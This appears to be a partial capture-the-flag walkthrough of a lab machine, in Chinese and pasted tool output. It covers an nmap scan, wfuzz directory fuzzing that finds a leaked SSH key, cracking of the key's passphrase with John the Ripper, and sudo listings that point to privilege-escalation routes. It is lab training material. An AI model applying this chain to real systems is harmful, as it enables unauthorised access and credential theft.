Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-03 09:44 CST Nmap scan report for 192.168.31.100 Host is up, received arp-response (0.0072s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 ed:ea:d9:d3:af:19:9c:8e:4e:0f:31:db:f2:5d:12:79 (RSA) | 256 bf:9f:a9:93:c5:87:21:a3:6b:6f:9e:e6:87:61:f5:19 (ECDSA) |_ 256 ac:18:ec:cc:35:c0:51:f5:6f:47:74:c3:01:95:b4:0f (ED25519) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.48 ((Debian)) |_http-server-header: Apache/2.4.48 (Debian) | http-robots.txt: 1 disallowed entry |_/~myfiles |_http-title: Site doesn't have a title (text/html). 30071/tcp filtered unknown no-response MAC Address: 68:17:29:E3:EC:39 (Intel Corporate) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 38.75 seconds
/home/monoceros406/.local/lib/python3.11/site-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.31.100/~secret/FUZZFUZ2Z Total requests: 175328
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000007: 200 5 L 54 W 331 Ch "# - .txt" 000000001: 200 5 L 54 W 331 Ch "# directory-list-2.3-small.txt - .txt" 000000003: 200 5 L 54 W 331 Ch "# - .txt" 000000015: 200 5 L 54 W 331 Ch "# or send a letter to Creative Commons, 171 Second Street, - .txt" 000000028: 200 5 L 54 W 331 Ch "http://192.168.31.100/~secret/" 000000023: 200 5 L 54 W 331 Ch "# on at least 3 different hosts - .txt" 000000025: 200 5 L 54 W 331 Ch "# - .txt" 000000024: 200 5 L 54 W 331 Ch "# on at least 3 different hosts" 000000026: 200 5 L 54 W 331 Ch "#" 000000022: 200 5 L 54 W 331 Ch "# Priority-ordered case-sensitive list, where entries were found" 000000021: 200 5 L 54 W 331 Ch "# Priority-ordered case-sensitive list, where entries were found - .txt" 000000020: 200 5 L 54 W 331 Ch "#" 000000014: 200 5 L 54 W 331 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/" 000000018: 200 5 L 54 W 331 Ch "# Suite 300, San Francisco, California, 94105, USA." 000000017: 200 5 L 54 W 331 Ch "# Suite 300, San Francisco, California, 94105, USA. - .txt" 000000019: 200 5 L 54 W 331 Ch "# - .txt" 000000016: 200 5 L 54 W 331 Ch "# or send a letter to Creative Commons, 171 Second Street," 000000013: 200 5 L 54 W 331 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/ - .txt" 000000012: 200 5 L 54 W 331 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this" 000000008: 200 5 L 54 W 331 Ch "#" 000000002: 200 5 L 54 W 331 Ch "# directory-list-2.3-small.txt" 000000004: 200 5 L 54 W 331 Ch "#" 000000005: 200 5 L 54 W 331 Ch "# Copyright 2007 James Fisher - .txt" 000000006: 200 5 L 54 W 331 Ch "# Copyright 2007 James Fisher" 000000010: 200 5 L 54 W 331 Ch "# This work is licensed under the Creative Commons" 000000009: 200 5 L 54 W 331 Ch "# This work is licensed under the Creative Commons - .txt" 000000011: 200 5 L 54 W 331 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this - .txt" 000091294: 200 5 L 54 W 331 Ch "http://192.168.31.100/~secret/"
/home/monoceros406/.local/lib/python3.11/site-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.31.100/~secret/.FUZZFUZ2Z Total requests: 175328
===================================================================== ID Response Lines Word Chars Payload =====================================================================
000000007: 200 5 L 54 W 331 Ch "# - .txt" 000000028: 200 5 L 54 W 331 Ch "http://192.168.31.100/~secret/." 000000026: 200 5 L 54 W 331 Ch "#" 000000025: 200 5 L 54 W 331 Ch "# - .txt" 000000023: 200 5 L 54 W 331 Ch "# on at least 3 different hosts - .txt" 000000024: 200 5 L 54 W 331 Ch "# on at least 3 different hosts" 000000021: 200 5 L 54 W 331 Ch "# Priority-ordered case-sensitive list, where entries were found - .txt" 000000022: 200 5 L 54 W 331 Ch "# Priority-ordered case-sensitive list, where entries were found" 000000019: 200 5 L 54 W 331 Ch "# - .txt" 000000014: 200 5 L 54 W 331 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/" 000000017: 200 5 L 54 W 331 Ch "# Suite 300, San Francisco, California, 94105, USA. - .txt" 000000020: 200 5 L 54 W 331 Ch "#" 000000018: 200 5 L 54 W 331 Ch "# Suite 300, San Francisco, California, 94105, USA." 000000016: 200 5 L 54 W 331 Ch "# or send a letter to Creative Commons, 171 Second Street," 000000011: 200 5 L 54 W 331 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this - .txt" 000000010: 200 5 L 54 W 331 Ch "# This work is licensed under the Creative Commons" 000000012: 200 5 L 54 W 331 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this" 000000009: 200 5 L 54 W 331 Ch "# This work is licensed under the Creative Commons - .txt" 000000013: 200 5 L 54 W 331 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/ - .txt" 000000006: 200 5 L 54 W 331 Ch "# Copyright 2007 James Fisher" 000000005: 200 5 L 54 W 331 Ch "# Copyright 2007 James Fisher - .txt" 000000008: 200 5 L 54 W 331 Ch "#" 000000002: 200 5 L 54 W 331 Ch "# directory-list-2.3-small.txt" 000000004: 200 5 L 54 W 331 Ch "#" 000000003: 200 5 L 54 W 331 Ch "# - .txt" 000000015: 200 5 L 54 W 331 Ch "# or send a letter to Creative Commons, 171 Second Street, - .txt" 000000001: 200 5 L 54 W 331 Ch "# directory-list-2.3-small.txt - .txt" 000091294: 200 5 L 54 W 331 Ch "http://192.168.31.100/~secret/." 000168723: 200 1 L 1 W 4689 Ch "mysecret - .txt"
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ WARNING: UNPROTECTED PRIVATE KEY FILE! @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Permissions 0644 for 'sshkey' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "sshkey": bad permissions
更改权限:
1
sudo chmod 0600 ./sshkey
再次尝试连接,发现SSH私钥需要解密密钥,尝试John-The-Ripper爆破:
1 2
ssh2john sshkey > sshkey.john john sshkey.john --wordlist=/usr/share/wordlists/fasttrack.txt
密钥是:
1 2 3 4 5 6 7 8 9 10 11
Created directory: /home/monoceros406/.john Using default input encoding: UTF-8 Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes Cost 2 (iteration count) is 16 for all loaded hashes Will run 32 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status P@55w0rd! (sshkey) 1g 0:00:00:00 DONE (2024-01-03 14:48) 1.123g/s 287.6p/s 287.6c/s 287.6C/s Spring2017..monkey Use the "--show" option to display all of the cracked passwords reliably Session completed.
Matching Defaults entries for icex64 on LupinOne: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icex64 may run the following commands on LupinOne: (arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
Matching Defaults entries for arsene on LupinOne: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User arsene may run the following commands on LupinOne: (root) NOPASSWD: /usr/bin/pip